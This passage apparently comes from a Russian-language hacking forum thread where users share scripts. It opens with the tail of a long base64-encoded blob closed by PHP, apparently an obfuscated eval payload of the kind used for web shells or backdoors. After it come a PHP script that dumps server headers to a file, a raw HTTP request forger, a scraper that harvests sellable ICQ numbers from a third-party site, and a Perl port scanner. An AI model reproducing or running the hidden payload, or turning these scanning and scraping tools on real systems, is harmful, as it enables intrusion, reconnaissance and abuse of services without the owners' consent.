kFpPqVUrIMqdHmxqPwaRuSKvoncKOxkpnqLw4CI31SHRyAn8Cop5M9rKCxXaqG5us1vjSjTbW2RvulpFstc+CPRIums8J3kg4PctUxuCFlRoi74QD9ZxCix0ftTqo7jXpg/ftUTR1yjiv5V/Fv+dG39+/d+cs/5NjDWfMKTuB+wO45lDc6RO3+0RPSYWKd+oDXg8d3IAZUwVFFkn0ksHEGY5+j6Ew9JMcy0gfF3/q1Wi3wcKMG3Atus0jiDTs0HzhEh/a8D/kNVABhZaokwmKaSZxJ2sSkc7l/56s7fx9zMMI1SKvv6NiPgfsFbcEOnwHt3U7Tw7jm7doa1RAcCHbXZtHBBNvk5S5TAVIG4d5PuyE6OIKw9XP++C2TBes3oRJg/Soq+f7ena8fpFQyNb4m4pxoOrOmqEjGPGknYtp6lJfTSZlTxqGKVRYjuTmZmGfIxjOeAkkUQ1l24sZT8YRlmByPCaRIYt8QpDYfxYr1EmkS5zztBs6iizyd08X8WAE7JCXPqFiuV/nL8Yg30zVKflQQraTtO/I9QeIcKt4CHWJLEqqveGzst6H9OIww1de3aGs8pUf6dQhaQEtnz579LRlO5O4MulsfA/3XwZy+rkVvUKX8F19kTOGbWGdtHtacSoVFSZ4ZoxwXvTFfEQ0lEg3Je6+HYXt372dSNRy+TEdFSa9hfavq3JRYZJR0x7ax7ks8tEnLEqIk2MiIgxKJqWIlIAYEJHNHi2X2ccKp9IUzJiTXTvZRRMZUSehGKq/8DSpf/rIZQEyCYGi+Rq4I0zEIyiwQ8VwSxYP9l+hx8PTFFAzkHCxn07SnYogoMzAk5pIYvg6fdHszAGhontdyXGMmDIJ4DIx4OonkYdCH/E6g3A8O+uEhraCH6mfp8yZ2tyVWO0tvL0msdpbOSuVsPJR+BAYfjaQP1dIpVbDUHG377ouDcI8Ui1KZp2ZSq8iQ5O1xESfpodE3VpONeH5+yuECwTkxxV2Mfv8mL8u88zK019RXd2ndsK+n6DdlTApnmIltIRPQwtjzR46LDBMjRfoGbjSHYafd7cFd9yXcNJ6DE4b7vDMw1aV4CISgrfsVozqGTLylnWAJTDsu9pqWj1TE+NLZbM3EDS62hn/2xE/VdR1X4d+kxd2S1Pv+KmgCu+qy6BjwV9YENVf4BibJBkw5LYO9vWMvEMx6wyKHJ4lX5mUJSjXCQ7wuoH1RSRhisg8UvSiAQS7QxbjCREUiky8Zssw4/jgo4x5/P+j2dveO2t3EXf44inMm1LT1X1iSw0qraUy7Fo7c4ycV5w/ERlM3lujOEgUIdPD8AO2GbaIKpPQ66KD7Y3fQQfOWX3oPZKEuem9+0y/lj09PGCCOKuqrsD2mG0HoK4RndjciERbJ26Jpiol2nq2Yr8L9oBe0ewH4/qAf7h5ba4Eb5rbn4/qr7J6teLP7H5cTIrtmvsTNdKj6FMabrEDpl3CvVXzGfjxDtRzbFXd6eIpQxubzqyNkZ8kwsuf4fUTimP93OJMyquS7VnTZtE10FdcdH6NPTdxC500X3VguLKGGixfByCzsYRos5nWnsV0iX3fB0kuLl5R88VKVvVI2gf9/ASblWnc='))); ?>
Скрипт читающий все HTTP заголовки посылаемые браузером.(правда есть одно "но" он выводит инфу о сервере. но кому надо тот поймёт где что.) PHP: <?php $r = fopen('123.txt',"w+"); $kea=array_keys($_SERVER); $vala=array_values($_SERVER); for($i=0;$i<count($_SERVER);$i++) fputs($r,$kea[$i]."=".$vala[$i]."\r\n"); fclose($r); ?>
PHP: <? #(C) NOmeR1 if($_POST['packets']) { $site = preg_replace('|\s|',NULL,preg_replace('/^.*Host:\s+(.+)\s*(\n|\r\n).*$/isU', '\\1', $_POST['packets']."\r\n")); function answer($site, $headers) { $fp = fsockopen($site, 80); fwrite($fp, $headers."\r\n\r\n"); $packets = fread($fp, 2048); $packets = preg_replace("/^(.+)(\n|\r\n){2,}.*$/isU", "\\1", $packets); return $packets; } echo '<table width=100%><tr width=100%><td align="left"><form method=POST><textarea name="packets" style="width:400px;height:200px;">'.$_POST['packets'].'</textarea><br> <input type=submit></form></td> <td align="right"><textarea style="width:400px;height:200px;">'.answer($site, $_POST['packets']).'</textarea></td></tr></table>'; } else { echo('<table width=100%><tr width=100%><td align="left"><form method=POST><textarea name="packets" style="width:400px;height:200px;">GET / HTTP/1.0 Host: www.antichat.ru</textarea><br> <input type=submit></form></td>'); } ?> Скрипт - "поддельщик" запросов. Отсылает поддельные пакеты и читает ответ сервера. Что-то типо InetCrack... Может кому и понадобится.
простой скрипт - собирает с асечки базу номерков, которые на асечке в продаже (а ля в подборе под телефонный номер). Результат выводит в браузер. Кому надо может и в фалл писать. С параметрами по умолчанию собирает только шестизнаки. PHP: <?php $start = 100000; $end = 999999; $current = $start; if (isset($_REQUEST['start'])) { $current = $_REQUEST['start']; } if (($current < $start) || ($current>$end)) { die('error in paramethers'); } while ($current<=$end) { $page = file_get_contents("http://online.asechka.ru/check-more?uin=".$current); $is_popal = preg_match_all('/'.$current.'/s', $page, $tmpp); if ($is_popal >2) { echo $current."<br>"; } else { preg_match_all('|<td>([0-9]+)<.td>|Uis',$page,$out,PREG_PATTERN_ORDER); foreach($out[1] as $anchor) { echo $anchor."<br>"; $current = $anchor; } } $current = $current + 1; } ?>
Сканер портов бай ми. Тренируюсь PHP: #!/usr/bin/perl use warnings; use strict; use IO::Socket; print "Enter IP adress: "; my $ip_addr = <STDIN>; print "Enter Port's Range: "; my $al = <STDIN>; print "Choose Protocol (tcp/udp): "; my $PRT = <STDIN>; my ($from, $to) = split(/-/,$al); open (RS,">results.txt"); chomp($ip_addr,$from,$PRT); print "\n[~] Scaning in procces..\n"; while ($from <= $to) { my $sock = new IO::Socket::INET -> new(Proto => $PRT, PeerPort => $from, PeerAddr => $ip_addr, timeout => 10); if (!$sock) { print RS $ip_addr,":",$from, "- Closing\n"; $from++; } else { print RS $ip_addr,":",$from, "- Opened!\n"; $from++; } } print "[!] Scaning over!\n"; close RS; Пишете ИП, Диапазон портов в виде 1-888, и выбираете протокол. Tcp/udp.
